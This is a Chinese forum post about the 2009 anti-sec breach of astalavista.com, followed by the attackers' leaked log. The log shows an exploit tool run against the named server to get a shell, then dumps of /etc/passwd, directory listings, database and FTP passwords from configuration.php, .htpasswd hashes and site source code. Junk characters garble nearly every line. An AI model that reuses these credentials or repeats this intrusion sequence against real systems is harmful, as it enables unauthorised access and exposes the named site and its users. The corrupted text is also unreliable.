里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 X& h1 u# |- _2 X
2 f/ O6 h8 ?0 N$ R9 e; p
[root@front3 ~]# curl -I litespeedtech.com
" p/ c- E3 @" L- N( NHTTP/1.1 200 OK7 _0 u) g6 R; B" R8 ~/ Q! R. K
Date: Fri, 05 Jun 2009 22:54:51 GMT
7 x. d& O/ w WServer: LiteSpeed3 T* g8 K5 d$ S6 Q3 U
/ @' f/ K& f- z7 C4 m, R: h9 Z另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
8 F9 H$ o) y) a9 ?/ _& z1 z* m8 D2 K! j$ {9 t' n' Z- G" _
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
- M& G2 y- j# U2 a" @7 T: [0 x6 `/ l0 O+ Z+ J- ^. M% M$ A# i1 }5 V; q
0 ^. d u2 G; ] Z- X
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
- J$ q7 B& G( U/ y/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \- Q8 F; f- {- R2 o* i
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
) o. x4 ^3 j# d' W! R\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
! m" {- K" f1 l2 ~4 v6 v \/ \/ \/ \/ \/ \/ \/" u4 g5 y5 {- p* Y( L9 _ _
The Hacking & Security Community
! ^4 q7 M2 y" M* Q[+] Founded in 1997 by a hacker computer enthusiast
/ x( f+ O' T9 X- s7 w8 u) z1 ^9 D2 L[-] Exposed in 2009 by anti-sec group1 }' n( N4 }" N/ N( m6 X! c9 ~
) }" k3 D9 H2 p: M3 A& r1 Z
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:) n" m. \4 f$ v' J
>> 03. Who’s behind the site? A v. f+ M t+ H" S; B
>>
) h X v& A! a- `>> A team of security and IT professionals, and a countless number of contributors from all over the world.. {+ l9 @. s& a) \# N* I
& N2 O1 \ Y4 x3 `, V a
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?$ T& g8 I, V/ T- l2 t
>>
7 _5 H0 B. g3 F5 P7 Q>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
/ }2 w7 r# q# | R' T/ Y- I& x9 jmilitary institutions.- ?7 U1 Q4 {" G w( [
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information./ [; I2 n3 { z6 F' I' G
' I1 a' C3 j; K
Why has Astalavista been targeted?$ Z$ K- |2 e* j5 Q: Y
# B# D2 w) Z% v6 p
Other than the fact that they are not doing any of this for the “community” but
9 Z; W2 ~4 L$ R7 nfor the money, they spread exploits for kids, claim to be a security community/ x: M9 Z- p$ R) e( w% F9 |" D
(with no real sense of security on their own servers), and they charge you $6.66
1 s" t5 E' p+ e. G gper months to access a dead forum with a directory filled with public releases
" P# V) _9 ~4 @7 D O1 k' `and outdated / broken services.% y" x& T& x& X8 U7 ^& m: {3 C
# x/ C: i6 `2 W6 }; i) b" H- `: UWe wanted to see how good that “team of security and IT professionals” really is.
- l' H& p% h5 h. |' v
* j# D4 U( | ~3 { O2 ^- QLet’s begin.
2 c: _; F; Q# @5 V1 j
7 S* Y, A* r/ I7 {- v! \anti-sec:~# ./g0tshell astalavista.com -p 806 h- F3 M1 x, N& h$ i. F. _* f# B" d
[+] Connecting to astalavista.com:80
# X4 F5 m6 P* \/ j[+] Grabbing banner…0 H9 @# b5 f" Y" S: u+ t0 h
LiteSpeed( f3 W8 K2 n/ u8 I0 y( D4 Y
[+] Injecting shellcode…
, m1 d% V9 R6 ]& ~9 p[-] Wait for it: L7 @# W6 U7 [% h4 [' t
1 Q8 g( h0 w4 C% b5 u1 Y+ l$ a1 x[~] We g0tshell
1 b% F2 K1 \# D. guname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux5 v O& y! N+ n* x! e
ID: uid=100(apache) gid=500(apache) groups=500(apache)
7 \, I* U; o4 o( ~" k
9 r/ P. Q% i+ {7 Msh-3.2$ cat /etc/passwd, Z7 f2 ^- b7 E% e/ {
root:x:0:0:root:/root:/bin/bash
: v7 s7 o/ T# g; w3 ebin:x:1:1:bin:/bin:/sbin/nologin/ T8 L8 V( m' j' R/ X/ h. q# _
daemon:x:2:2:daemon:/sbin:/sbin/nologin
0 D5 Y4 v X `& e' M6 N! ladm:x:3:4:adm:/var/adm:/sbin/nologin
4 |8 A% l2 J, v9 M( `2 W' c8 Zlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin; n; q4 y+ {0 l$ m, O$ g" M8 }
sync:x:5:0:sync:/sbin:/bin/sync
5 S$ {) W/ K1 `shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown4 J, t, y5 a6 E2 X
halt:x:7:0:halt:/sbin:/sbin/halt
' m" L( L9 z3 u/ H( J- f4 Email:x:8:12:mail:/var/spool/mail:/sbin/nologin
" H% C) _& m7 ?+ E' d9 p) F cnews:x:9:13:news:/etc/news:0 r f; x/ n8 R, \6 c" r
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin( t& p1 y/ ^5 S
operator:x:11:0 perator:/root:/sbin/nologin" o$ a" o3 Y& U2 Z" z
games:x:12:100:games:/usr/games:/sbin/nologin
& {/ E" \/ [5 ?$ O( Jgopher:x:13:30:gopher:/var/gopher:/sbin/nologin: E0 K9 ^' q. F' b3 u" \
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin& S! |& r0 F' q4 }# {6 Y7 ^
nobody:x:99:99:Nobody:/:/sbin/nologin
4 R6 e& @) l8 U0 E R3 _4 drpm:x:37:37::/var/lib/rpm:/sbin/nologin% q5 c5 C1 X7 h5 k9 A* u0 p
dbus:x:81:81:System message bus:/:/sbin/nologin
4 i4 y0 i6 q2 D8 pnscd:x:28:28:NSCD Daemon:/:/sbin/nologin2 d2 a: Q) n# V1 p* I b( E
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
4 L X5 f/ a& ]/ S0 V }smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- u/ ], Q# _+ R h, D' avcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
' t8 v; Z) n" e8 G/ i+ K' }0 Fhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin) m$ r. T4 u% |3 F2 d6 z
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin( A4 {7 G6 p- B5 x `
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin5 t1 L" j. Q$ [! r
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin9 O: g9 @5 n$ ^7 _% Z$ |
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin' `- t' M/ n' q3 o$ }' @
pcap:x:77:77::/var/arpwatch:/sbin/nologin' f. ]/ w+ {' i
named:x:25:25:Named:/var/named:/sbin/nologin2 S* O. V# @- R# H, k" p
apache:x:100:500::/var/www:/bin/false
, m* N l8 M2 x4 f) Kdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
8 D$ k/ F+ Z7 h. Q* q0 \. t* }mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash+ N: J1 x2 `5 x0 u& I8 V$ \* J1 K
webapps:x:500:501::/var/www/html:/bin/bash
. z% H1 J8 ]2 Z- @majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, ?6 @1 y% ?4 Q) G
admin:x:501:502::/home/admin:/bin/bash8 w% e4 C3 r, M
jon:x:502:503::/home/jon:/bin/bash$ U1 Y6 W9 X# Y1 N- }: S6 O
com:x:503:504::/home/com:/bin/bash* x; A7 o8 z: R- b. a0 B; Z* ]2 G
ntp:x:38:38::/etc/ntp:/sbin/nologin' S% |+ o; a( \2 z8 q9 q2 ]5 j" a2 g3 F
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
, y7 ~# ~# \/ N! [8 _astanet:x:504:505::/home/astanet:/bin/bash' @( ]& P, Z4 l, j- X j( A* s
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
# T0 Y) a- C h8 navahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin; U' f! o6 U2 `, U+ A2 {# \6 y
- |% m8 N3 d/ X; O
sh-3.2$ cat /etc/hosts
& a/ l9 w# x; E+ K+ ~4 y& h3 g- K# Do not remove the following line, or various programs
* t8 z4 Y, S: k' Z: a2 m$ l' q9 s# that require network functionality will fail.
- l- t( K7 Z; l! H127.0.0.1 localhost.localdomain localhost
. Z- R- C2 j. ?- t0 I0 n" M7 b9 k( B::1 localhost6.localdomain6 localhost69 A0 O: k# M/ c0 u2 G
80.74.154.172 asta1.astalavistaserver.com9 B5 c. U/ {( B
9 R0 \, m+ I! N2 o& ysh-3.2$ pwd g8 r' G5 S0 M
/home/com/public_html5 ^) D2 S' _& R8 i& |. t- X
% N; h$ {, v( s. }' r( N& gsh-3.2$ ls -la7 |$ I" k7 U: Z" |+ O5 J) u
total 18460 F [' k4 S9 A$ z& s8 U: P+ c
drwxr-xr-x 30 com apache 4096 May 28 17:06 .9 f0 W& V, X7 H5 A) f* r+ `- w0 R
drwx–x–x 11 com com 4096 Jun 25 2008 ..$ {# m# b7 H* e# D* W0 `# Q
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin+ o; K& Y/ ]0 ~8 c# ?9 a* \8 r `
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache& f+ H: {/ U E' G2 D
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
. B+ @/ g2 g& }+ {$ \2 p2 Fdrwxrwxrwx 2 com com 4096 May 19 00:50 config
5 |/ l2 R+ _# R' }drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
5 Z* s+ {# }% f4 W" A6 pdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules2 }! }1 z0 ?' X8 z D# ~* Y. Z" a7 d
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
! D+ G1 R0 f* m" U( R$ W$ {drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
1 L. C1 V) c* f$ F" {- sdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
& S# m7 h- [, `+ {5 o-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php+ s& @/ F, _& Q v7 Y1 p3 k$ e
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
, v5 g$ ]$ j* C B% p3 I3 sdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
* ^# ~7 |0 l, I$ x-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
) j, N3 S/ }1 B- Z, W f# Qdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed/ v, d7 t L. j8 C5 V5 G" s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
4 w7 i% r4 ]* W5 w( [, F' x# a-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak, O3 {+ t' \( e* P: ~
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak0 b* `# }- ~1 y4 }
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
% ?- C. |4 ~( ^1 g1 `( wdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images$ w/ o! U# t: y* G
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
, @5 z" Q! A5 n6 Vdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer, A( X7 S( _' X" h/ f N; B* k1 Q8 O" h
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
/ F/ z. V7 Y0 g) D* U/ @drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
% d, L) d. S7 K7 ?drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
6 i! ^1 L$ T/ p' f- S5 [- C! Bdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
/ q* S; E* m; g0 Q0 d$ S) Idrwxr-xr-x 34 com com 4096 May 28 16:30 modules: x3 c3 t3 R1 [. }* \! k, m8 b9 j
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
; L4 E- M' [% O8 ?4 J% Wdrwxrwxr-x 22 com com 4096 May 28 17:06 _new* p5 n+ q4 b* ^, L; O
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old' v+ I- B; r: J: X
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy$ R7 `9 i W$ S
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy" L9 d. a0 h, T/ [
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
& N1 k2 M. i2 |( c3 j; e-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml( k! {3 M/ t" {* \+ g4 @
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
$ H/ m6 ?0 K" _* Fdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
! D4 S; [5 }; l3 B8 @$ I. [drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp0 ^0 H4 J! k5 }; w! r
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
1 L- x: b2 ?; J j" ]0 i$ |. x/ x0 K- l# `' O$ q3 x0 U% v
sh-3.2$ head -20 index.php
7 B3 }7 K- {( i- O/ P' p6 E! h8 O<?php( H6 s6 h5 Y4 e' ?$ N s
' j. S+ W# m. t+ p# Z) g/**) r4 H6 |" C* G/ z: Y4 v
* The main page for the CMS, H9 L- V8 l: P& C* ]; [8 n
* @copyright CONTREXX CMS - COMVATION AG. Q- s' z6 B" i: ?) O" e- Q2 \7 e
* @author Comvation Development Team
& v+ w7 f0 N6 ?6 U* @version v1.0.9.10.1 stable
9 g; }2 H6 ^/ D/ n4 h! l* @package contrexx
' i$ V( M# r. Z$ L* @subpackage core8 q, @# f2 a# J* s7 a, R: ~
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
+ {) x. f/ G1 z! P5 e1 }# P* @since v0.0.0.0
1 [6 {* L5 K8 {$ Y* @todo Capitalize all class names in project4 n7 V) B/ B0 O0 A: v" `
* @uses /config/configuration.php
8 s1 ?$ E/ w1 A$ e& n+ _: f* @uses /config/settings.php
; J5 |$ b C3 P v* @uses /config/version.php! s) N1 W- x( p" T* G8 f7 K1 c
* @uses /core/API.php
3 B! s% n, z# ~4 V! n, m* @uses /core_modules/cache/index.class.php! J$ o; P+ |6 g# B% x! S- i5 B
* @uses /core/error.class.php
9 o# t! V/ ^! L G8 C$ }0 B9 r* @uses /core_modules/banner/index.class.php
) l4 e! [5 l7 z2 [' g* @uses /core_modules/contact/index.class.php
$ D" C0 m/ y2 J+ Q# |' f$ e. C5 A! [0 u- v# d+ S! _' t: I/ X$ t" s' N
sh-3.2$ cd config/" _2 Y7 O2 {' ]# C1 b
sh-3.2$ ls -la; J( C0 O# E$ Q0 h2 ]6 C
total 32
- r4 `8 q# ?( x' udrwxrwxrwx 2 com com 4096 May 19 00:50 .) R' u; i+ c9 W. ]7 H" Y
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) z0 P! F8 } |" D9 M' C3 y4 Y-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
' @9 N. z* i, @2 K' D2 J" p-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php' U$ n- d4 x" F
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php/ i7 a$ a0 M' ?$ ^% V
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php% x. D% g6 [+ O* y6 u9 x9 {
& |; s$ Z/ r+ Q9 c9 b' vsh-3.2$ cat configuration.php
, w) n# Y/ s: j, m[snip]
) K# F: W0 v4 O$ Y* ?4 @$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost$ B% T+ K# X/ T e3 v, ~$ u
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
" R3 y7 T2 L$ N$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix6 b; T& s P; G* S( e( w' |0 D+ h
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username; s$ A3 F; S( }8 B
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 j- J9 w9 V: d" `
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
6 B( K, r5 B P# K) _+ q: L$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
% x. n1 p% D) h' z4 L+ Z[snip]/ A7 E' T' N E8 {1 G# ^4 e
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false5 R5 p8 w5 ~+ V& {8 T
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode1 V1 z- S' S" A5 b2 B
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost' Q% L2 w, B' i: F
$_FTPCONFIG['port'] = 21; // Ftp remote port* _ j8 @! f3 `% p" a
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username$ v. N$ |% A" T! }1 Q7 s5 y& p) c& E8 p
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password9 ^2 w* W3 Q H/ x9 r( Z: K
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
* |; h7 }3 R4 h1 L# G( @7 N, t. i/ p% ~: N I( Z0 k6 N
sh-3.2$ cd ..2 g; d4 j$ F: ^) |
sh-3.2$ cd dvd/; _# I; ]& |4 p% B
sh-3.2$ ls -la! I5 V& t. S" M1 W9 h% x: n. U
total 29137802 j" X* }5 z7 R
drwxr-xr-x 2 com com 4096 Sep 9 2008 ." E: z7 ]. J; |8 L+ v1 j
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 @+ W9 V7 H, V( D
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar( U% g1 {+ d* D: @/ K9 z. a
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
! g4 {* D: n5 O( n* G" r-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar3 A4 j+ a! J' `, {! h
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
% c" b, N, H3 v7 Z) n& K0 {* i& E# ?* `5 v5 P$ J& h5 f
sh-3.2$ cat .htaccess& K+ v- c1 k/ m4 x% t2 X$ F D
authType Basic
, d* ?- q0 ^- @" {authName DVD
3 q" s& k2 s& XauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd c# ?7 ]* C1 S5 g, ~/ {
require valid-user+ z- B' e. r9 L7 k% M
8 r/ `( t9 R# w' v" S+ e8 S
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
1 Y& G) w: |$ ^1 j, X& tDVDdownload:CRD8cuY6.MPT6) M, \; m3 Q5 I6 t; F6 E$ Y
DVDdownload2:CR8a36.wluFMg4 S! ]5 n9 M3 F' c- l& v
8 k( k: L. g" c; @# F$ N7 D3 T
sh-3.2$ cat test.php
# G$ b/ A8 n3 R2 ], J<?php) A& a3 P% D( W
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;, d4 a- _, g$ N- f' w
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
7 _- R5 d/ o1 zecho $url;$ b% }1 d" d' T) l! _: ?; y
?>
8 v& } j, P* n5 R1 {$ m3 `' W% \% k& X6 C1 \' j
sh-3.2$ cd modifications/7 y" ?, ?# I6 E6 J* w
sh-3.2$ ls -la' Q6 W2 m8 y; [9 @
total 32& |+ [' L: g5 S6 g
drwxr-xr-x 8 com com 4096 May 11 12:48 .* k6 n) A! W/ U. E
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ h7 ~7 f/ y! |drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
! n, o4 c$ E3 X& [7 T0 y- cdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs9 }& ~! K0 V% i- R" M4 O
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
1 B- {( g2 A" J2 ?drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc% A3 D+ @' i1 B, `5 g6 S8 g
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
; b, p) t% x7 t5 H, \! I, S7 rdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
$ p$ g$ T5 F4 I7 g
) x6 ^2 P& U( H7 ?1 ksh-3.2$ ls -R
0 R$ s" e+ o/ H.:9 j1 m' Y# g$ S& W$ f: N, }
com_avtng cronjobs onlinetools pjirc search _tmp
3 ]. m6 Z5 m5 t' I2 ~& o- w) Q7 @$ z5 {
./com_avtng:/ l) K( k! @ B2 j3 n) }( Q- }
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
& k* h* W: H. n
9 z1 O( o# Z" d0 b6 v7 W) o./com_avtng/scripts:
0 V( A8 {+ [5 b w* C- F7 K0 |popunder.js
& v- E6 e0 n! @: o* s8 J9 K% H) ?8 W8 [3 z
./cronjobs:
* A( q: ?* |$ R$ H8 gexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
4 y- O2 X1 l( H
% J- y: j$ u8 a$ F& r./cronjobs/tmp:
/ Z' q3 P" m& q& B' I5 lcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
, f) q; D! x) P s% i0 A) }
4 M, Q1 g. K0 z7 A./onlinetools:
" W! S+ E8 o8 O+ U! xindex.php
* `7 x2 J" a2 m2 P" a3 c( ~" g' ?" w$ }6 S9 T4 l$ V$ x
./pjirc:8 N6 m) N# ^- A# Q D$ V
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt$ \3 E$ g: i+ c1 B8 ]6 c
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt' j! f% l. B& w6 P1 ]
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd7 A. k+ P- c3 r+ E: d6 Y
: B9 k$ {9 ]& O' i" y
./pjirc/img:3 Y9 i7 K; q8 p3 v
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif. s% Z1 c/ s9 n- T
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
# G) t8 i+ a+ z, \verre-eau.gif
, T3 X0 }/ s# m( Hargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
8 Y- H! B! c, e! _/ Qverre-vin.gif4 n4 d6 G6 n9 Q- m5 S, k6 B. @% T
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
+ O( w' T! ?4 Zbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif# O" L" A7 ^. o! w# t
+ }- h; t$ h! r8 k./pjirc/snd:
2 d; k* o$ u6 Y+ f2 rbell2.au ding.au
6 b! ~1 M, l/ B5 ~0 {" w8 E
/ ^, ]" c* M2 Y./search:3 Y6 s/ \: s8 H4 J- } @
searchEngines.php search.php
, V4 l* [, m0 Q3 R% f9 a+ I- r: m/ [' Z
./_tmp:& G. l! e( g6 a8 ?
defaultPorts.php defaultPorts.txt
' C4 ]3 y6 D/ G9 F. M" k1 t
$ K' g9 G% D9 I/ Y) [sh-3.2$ cd cronjobs/& J: r. @# B9 I
sh-3.2$ cat exploits.php; e8 d+ _, D5 w( ]
[snip]
, j, _: ~. n9 n p8 Y0 X# {$categories = array();
) q, H. Q& O5 I% ]* s$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
. k- V* M6 U8 v! F' ^: e$expolits = file($milw0rmFile);
" p* X5 u" {5 M4 n+ U" H* `" h) l$comExploits = array();9 ~! w+ O9 `2 a
[snip]8 @' m$ H. z' ?% Z8 j+ I) a
// manage data
6 `1 u* h* B& Q7 q1 Hfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640! O* z7 {; @# N) l. l
& o/ j6 Y7 m% N6 k/ Y8 o Q' K0 [
// get path and title
+ m, a# t4 n4 q' t4 ~# E! W$ ?3 `7 U $expolits[$x] = trim($expolits[$x]);5 a* X: Z4 H( B6 y6 A2 b
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));3 s: V* _! t. Z6 L& P8 x
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
! H1 p6 @ m X1 B' ]4 m
9 t% \& p# G: |1 G6 Z // check if file exists: P! z1 m. Y& `9 s; U
if (file_exists($path)) {
. a1 s$ x' S) h0 y/ Y. W6 J; T) I* g" g+ k4 m/ g- r3 }3 H9 _
$text = file_get_contents($path);* t1 B+ H9 M% Z6 H9 q+ u7 [4 V
' V2 m( F6 x3 e% i) v8 P: f% W4 E
// get content and date/ @" W; I* P9 g9 g2 k
//$text = htmlspecialchars($text, ENT_QUOTES);3 ~1 L+ P N$ M& k+ t+ L
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
" Y% S" R p3 F5 D( R* B5 d if ($tmptext != ”) {
. F! E3 h7 q0 L- T; q$ y( h $text = $tmptext;
& t; F/ }' `; i- H3 v1 ~ } else {6 d8 o! S9 `5 \$ b% q
$text = addslashes(htmlentities($text, ENT_QUOTES));4 r0 z% P1 i. g1 s6 Y
}
- d* ?" U$ S+ I) Z$ y3 a1 E0 A $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com ['))); ?; f) { e2 B2 s; D9 S8 l
$tmp = explode('-', $date);" C- }- W1 Y( V6 F1 Q' [# ?
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));/ o8 J# i% P! t; F
$cat = getCategory ($path);% I3 N, _$ B& x; Y7 [. j
$ext = pathinfo(basename($path));/ H& M6 L& Z$ ]" o. q: S$ J( }
$ext = $ext['extension'];2 Q" c/ D' x! [& C/ c1 M
$qStr = ”
O8 ~( w( }7 l9 A& n- } SELECT `id`
9 I+ H* ^- X9 D# Y" U; @* T/ N: j FROM `contrexx_module_exploits`
7 W* N9 D. V/ p: w2 ^* q, X WHERE `title` = ‘” . $title . “‘
$ l; W l5 ] C AND `date` = ‘” . $date . “‘
3 L7 X; ~9 k3 {! w/ e “;8 R8 ^. J0 w# l g# L* l
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;, D" G2 b) r" H- K i
$q = $_objDB->query($qStr);
' C: O7 s# J9 c% p. f5 `
) o- v; K6 v5 c# {; A+ C5 e! l if ($q->numRows() == 0) {
5 f/ G) p/ O$ t" s; _
( o5 x9 w$ P! }* }/ x0 o, } // prepare array$ U! _) Z+ H. K" r# Q2 b( f. Q
$comExploits[$x]['date'] = $date;
5 `4 l, L) p6 ]+ D' }3 u $comExploits[$x]['title'] = $title;
% o# L$ G% J5 C' F6 L; A% ~# j $comExploits[$x]['author'] = ‘milw0rm’;
% b. y# m" Z } $comExploits[$x]['text'] = $text;' z# a/ |5 b3 g
$comExploits[$x]['source'] = $ext;& Z: B6 w7 c' S# d( i7 s8 t
$comExploits[$x]['url1'] = ”;
: q# l, @$ V4 |, A! |: `: g8 M' ` $comExploits[$x]['url2'] = ”;
" _) a, Q0 `; A+ N1 h, ` $comExploits[$x]['catid'] = $cat;; G4 ]8 F% W" s! e; r& O
$comExploits[$x]['lang'] = ‘2′;) b. o% m% U) a1 j+ ]! M x \
$comExploits[$x]['userid'] = ‘12′;0 `3 k" e0 [" |% `+ ~+ e- [
$comExploits[$x]['startdate'] = ‘0000-00-00′;6 Q( u) x- ^: w H' l$ s
$comExploits[$x]['enddate'] = ‘0000-00-00′;. z( K7 a% W& t8 Q, q" o1 n0 E
$comExploits[$x]['status'] = ‘1′;- }9 R! X& S K2 U) q, m2 V h2 F
$comExploits[$x]['changelog'] = $date;
@1 Q$ ^% k" ]' X) }6 `% L" I/ E
9 `2 @+ H: y. d8 F, v }
* n) e) b2 T3 |) u, |0 w; Y9 I[snip]
* S l4 o/ D; d% ~5 \8 ~ $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
